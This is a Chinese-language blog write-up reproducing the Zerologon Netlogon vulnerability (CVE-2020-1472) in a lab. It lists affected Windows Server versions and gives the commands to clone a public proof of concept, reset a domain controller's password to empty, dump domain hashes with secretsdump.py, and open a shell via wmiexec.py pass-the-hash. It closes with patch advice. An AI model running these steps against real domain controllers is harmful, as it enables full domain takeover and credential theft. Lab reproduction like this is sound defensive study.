title: CVE-2020-1472漏洞复现
author: 夜莺
categories:


CVE-2020-1472漏洞复现

0x01 漏洞简介

2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472 漏洞等级:严重 漏洞评分:10分 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序

0x02 漏洞影响

  1. Windows Server 2008 R2 for x64-based Systems Service Pack 1
  2. Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  3. Windows Server 2012
  4. Windows Server 2012 (Server Core installation)
  5. Windows Server 2012 R2
  6. Windows Server 2012 R2 (Server Core installation)
  7. Windows Server 2016
  8. Windows Server 2016 (Server Core installation)
  9. Windows Server 2019
  10. Windows Server 2019 (Server Core installation)
  11. Windows Server, version 1903 (Server Core installation)
  12. Windows Server, version 1909 (Server Core installation)
  13. Windows Server, version 2004 (Server Core installation)

0x03 漏洞复现

漏洞环境
靶机:Windows Server 2012
攻击机:Kali
复现步骤

  1. 拉取POC

    1. git clone https://github.com/dirkjanm/CVE-2020-1472.git
  2. CVE-2020-1472漏洞复现 - 图1

  3. 使用POC重置管理员密钥

python3 cve-2020-1472-exploit.py hostname ip

  1. > 坑:攻击机环境要求python版本在3.7以上,而且要获取最新版的Impacket,否则会产生如下报错报错(新版本中更新了我们利用中会用到的函数NetrServerPasswordSet2
  2. ![image-20200921180251867](https://blog-1255850204.cos.ap-guangzhou.myqcloud.com/uPic/image-20200921180251867.png)
  3. **安装Impacket**
  4. ```python
  5. git clone https://github.com/SecureAuthCorp/impacket
  6. cd impacket
  7. pip install .

效果如下:
CVE-2020-1472漏洞复现 - 图2
此时密码已经置空

  1. 获取HASH

    1. ~impacket/examples/
    2. # windows
    3. python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass # Windows无需转义
    4. # others
    5. python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass #注意转义

    成功获取HASH
    CVE-2020-1472漏洞复现 - 图3
    CVE-2020-1472漏洞复现 - 图4

  2. 获取Shell

根据第三步获取到的HASH,利用wmiexec.py登录,从而获取一个SHELL

  1. ~impacket/examples/
  2. python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

CVE-2020-1472漏洞复现 - 图5

0x04 修复建议

安装符合操作系统的漏洞补丁,
详情请见:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472

0x05 参考链接